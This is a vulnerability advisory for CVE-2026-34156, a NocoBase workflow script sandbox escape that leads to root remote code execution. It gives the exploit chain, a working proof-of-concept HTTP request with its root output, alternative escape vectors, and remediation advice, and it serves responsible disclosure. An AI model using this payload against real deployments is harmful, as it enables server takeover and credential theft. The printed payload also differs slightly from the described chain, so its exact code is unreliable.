CVE-2026-34156

## Summary

NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOWSCRIPTMODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr.

An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.

Exploit Chain

1. console._stdout.constructor.constructor → host-realm Function constructor
2. Function('return process')() → Node.js process object
3. process.mainModule.require('child_process') → unrestricted module loading
4. child_process.execSync('id') → RCE as root

This completely bypasses the customRequire allowlist.

Impact

• Remote Code Execution as root (uid=0) inside Docker container
• Database credential theft (DB_PASSWORD, INITROOTPASSWORD from process.env)
• Arbitrary file read/write via require('fs')
• Reverse shell confirmed
• Outbound network access for lateral movement

Proof of Concept

HTTP Request:

POST /api/flow_nodes:test

Authorization: Bearer <JWT_TOKEN>

Content-Type: application/json

{

  "type": "script",

  "config": {

    "content": "const Fn=console.stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('childprocess');return cp.execSync('id').toString().trim();",

    "timeout": 5000,

    "arguments": []

  }

}

Response:

{"data":{"status":1,"result":"uid=0(root) gid=0(root) groups=0(root)","log":""}}

Environment

• Docker image: nocobase/nocobase:latest
• NocoBase CLI: v2.0.26
• Node.js: v20.20.1
• OS: Debian GNU/Linux 12 (bookworm)

PoC

Got reverse shell

<img width="1300" height="743" alt="Screenshot 2026-03-26 at 06 09 51" src="https://github.com/user-attachments/assets/fcb65346-2d98-485a-a849-153d5957c78e" />

Proof of concept the root privileges

<img width="1292" height="515" alt="Screenshot 2026-03-26 at 06 12 29" src="https://github.com/user-attachments/assets/599cd915-d5e9-47b6-9ddb-655ae4f22d50" />

os-release demonstration

<img width="1290" height="523" alt="Screenshot 2026-03-26 at 06 12 54" src="https://github.com/user-attachments/assets/48030450-f2b1-4edc-a7f0-caafbf55dd00" />

<img width="1296" height="516" alt="image" src="https://github.com/user-attachments/assets/f7012c09-885b-48fb-a6d4-7282c0326d0b" />

App path

<img width="1295" height="516" alt="Screenshot 2026-03-26 at 06 14 04" src="https://github.com/user-attachments/assets/b4846af8-cb10-4c2a-886f-b19a120c2245" />

Exploit Usage:

Reverse Shell Mode

<img width="1299" height="523" alt="tool1" src="https://github.com/user-attachments/assets/6c26d6f3-0ad2-4a61-9692-b150409ee569" />

Dump system information & creds

<img width="635" height="591" alt="tool2" src="https://github.com/user-attachments/assets/08dbc231-d686-4536-8a74-272ceb5c10a8" />

Remote Command Execution Mode

<img width="644" height="467" alt="tool3" src="https://github.com/user-attachments/assets/fc95d89b-eff5-4eec-87b4-f6022778feec" />

​

Remediation

1. Replace Node.js vm module with isolated-vm for true V8 isolate separation
2. Do not pass the host console object into the sandbox; create a clean proxy
3. Run the application as a non-root user inside Docker
4. Restrict /api/flow_nodes:test to admin-only roles

Alternative Escape Vectors

• console._stderr.constructor.constructor (identical chain via stderr)
• Error.prepareStackTrace + CallSite.getThis() (V8 CallSite API)

Reporter

Onurcan Genç — Independent Security Researcher, Bilkent University